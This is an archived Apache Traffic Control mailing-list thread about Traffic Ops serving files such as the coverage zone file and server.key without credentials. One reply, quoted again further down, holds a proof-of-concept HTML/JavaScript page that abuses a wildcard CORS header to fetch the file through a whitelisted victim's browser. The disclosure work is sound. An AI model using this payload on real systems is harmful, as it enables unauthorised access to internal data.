You are viewing a plain text version of this content. The canonical link for it is here.
Posted to dev@trafficcontrol.apache.org by Nir Ichye <ni...@qwilt.com> on 2017/09/19 07:52:49 UTC
Public resources in Traffic Ops
Hi,
It seems that several files in TO can be accessed without credentials. This
includes:
- Coverage Zone File (http[s]://<opsDomain>/routing/coverage-zone.json)
- server.key (http[s]://<opsDomain>/routing/server.key)
- and other files in the public folder.
Can you tell if the files are public on purpose and if this could be a
security issue?
Thanks,
Nir.
Re: Public resources in Traffic Ops
Posted by Rawlin Peters <ra...@gmail.com>.
Hey Nir,
At least for the CZF, it's really not necessary to have that in the
'public' directory at all, because TRs just retrieve it from the URL
configured in Traffic Ops anyways. I don't know the history of why it
was put in the 'public' directory in the first place, but it's
definitely not necessary now because the URL is configured via Traffic
Ops and doesn't have to be on the TO server itself:
In the TR profile, add the following param:
parameter name: coveragezone.polling.url
config file name: CRConfig.json
value: a URL for the CZF
Using that parameter you could serve the CZF on a separate server with
ACLs that only allow access from your TRs. But if we want to put the
CZF behind some kind of real authentication (other than basic auth in
the URL), then we'd have to build that functionality into TR.
- Rawlin
On Mon, Jul 23, 2018 at 8:16 AM Nir Ichye <ni...@qwilt.com> wrote:
>
> Sorry for bringing this thread from the dead, but I think that it is still
> exploitable.
>
> Even if ops is protected by ACL, an attacker could use a JS code to access
> it on behalf of a user who has access to OPS.
>
> I've made a proof of concept to show that an attacker can fetch the czf
> file from ops.
> This is possible both because the resource requires no authentication and
> since ops returns "Access-Control-Allow-Origin: *" which allows any host to
> gain access to these resources.
>
> To try it yourself paste the following content in html file and open it in
> your browser. You should change "ops-host" to your ops hostname.
> To exploit this, an attacker should send a link with this code to someone
> who is whitelisted in the ACL.
>
> <html>
> <body>
> <script>
> czfUrl = "https://ops-host/coverage-zone.json"
>
> function loadDoc(url, divId) {
> var xhttp = new XMLHttpRequest();
> xhttp.onreadystatechange = function() {
> if (this.readyState == 4 && this.status == 200) {
> document.getElementById(divId).innerHTML =
> this.responseText;
> }
> };
> xhttp.open("GET", url, true);
> xhttp.send();
> }
> loadDoc(czfUrl,"czf")
>
> </script>
> <div id="czf"></div>
> </body>
> </html>
> *---*
> *Nir Ichye*
> Qwilt | Work: +972-72-2221675 | Mobile: +972-54-7630105 | niri@qwilt.com
>
>
> On Tue, Sep 19, 2017 at 4:55 PM Dave Neuman <ne...@apache.org> wrote:
>
> > Anything in the "public" directory is made public so that other components
> > (llike Traffic Router) can get to it without authentication.
> > It is recommended that you have some ACLs in front of Traffic Ops to limit
> > who/what can access it.
> >
> >
> >
> > On Tue, Sep 19, 2017 at 1:52 AM, Nir Ichye <ni...@qwilt.com> wrote:
> >
> > > Hi,
> > >
> > > It seems that several files in TO can be accessed without credentials.
> > This
> > > includes:
> > > - Coverage Zone File (http[s]://<opsDomain>/routing/coverage-zone.json)
> > > - server.key (http[s]://<opsDomain>/routing/server.key)
> > > - and other files in the public folder.
> > >
> > > Can you tell if the files are public on purpose and if this could be a
> > > security issue?
> > >
> > > Thanks,
> > > Nir.
> > >
> >
Re: Public resources in Traffic Ops
Posted by Nir Ichye <ni...@qwilt.com>.
Sorry for bringing this thread from the dead, but I think that it is still
exploitable.
Even if ops is protected by ACL, an attacker could use a JS code to access
it on behalf of a user who has access to OPS.
I've made a proof of concept to show that an attacker can fetch the czf
file from ops.
This is possible both because the resource requires no authentication and
since ops returns "Access-Control-Allow-Origin: *" which allows any host to
gain access to these resources.
To try it yourself paste the following content in html file and open it in
your browser. You should change "ops-host" to your ops hostname.
To exploit this, an attacker should send a link with this code to someone
who is whitelisted in the ACL.
<html>
<body>
<script>
czfUrl = "https://ops-host/coverage-zone.json"
function loadDoc(url, divId) {
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
document.getElementById(divId).innerHTML =
this.responseText;
}
};
xhttp.open("GET", url, true);
xhttp.send();
}
loadDoc(czfUrl,"czf")
</script>
<div id="czf"></div>
</body>
</html>
*---*
*Nir Ichye*
Qwilt | Work: +972-72-2221675 | Mobile: +972-54-7630105 | niri@qwilt.com
On Tue, Sep 19, 2017 at 4:55 PM Dave Neuman <ne...@apache.org> wrote:
> Anything in the "public" directory is made public so that other components
> (llike Traffic Router) can get to it without authentication.
> It is recommended that you have some ACLs in front of Traffic Ops to limit
> who/what can access it.
>
>
>
> On Tue, Sep 19, 2017 at 1:52 AM, Nir Ichye <ni...@qwilt.com> wrote:
>
> > Hi,
> >
> > It seems that several files in TO can be accessed without credentials.
> This
> > includes:
> > - Coverage Zone File (http[s]://<opsDomain>/routing/coverage-zone.json)
> > - server.key (http[s]://<opsDomain>/routing/server.key)
> > - and other files in the public folder.
> >
> > Can you tell if the files are public on purpose and if this could be a
> > security issue?
> >
> > Thanks,
> > Nir.
> >
>
Re: Public resources in Traffic Ops
Posted by Dave Neuman <ne...@apache.org>.
Anything in the "public" directory is made public so that other components
(llike Traffic Router) can get to it without authentication.
It is recommended that you have some ACLs in front of Traffic Ops to limit
who/what can access it.
On Tue, Sep 19, 2017 at 1:52 AM, Nir Ichye <ni...@qwilt.com> wrote:
> Hi,
>
> It seems that several files in TO can be accessed without credentials. This
> includes:
> - Coverage Zone File (http[s]://<opsDomain>/routing/coverage-zone.json)
> - server.key (http[s]://<opsDomain>/routing/server.key)
> - and other files in the public folder.
>
> Can you tell if the files are public on purpose and if this could be a
> security issue?
>
> Thanks,
> Nir.
>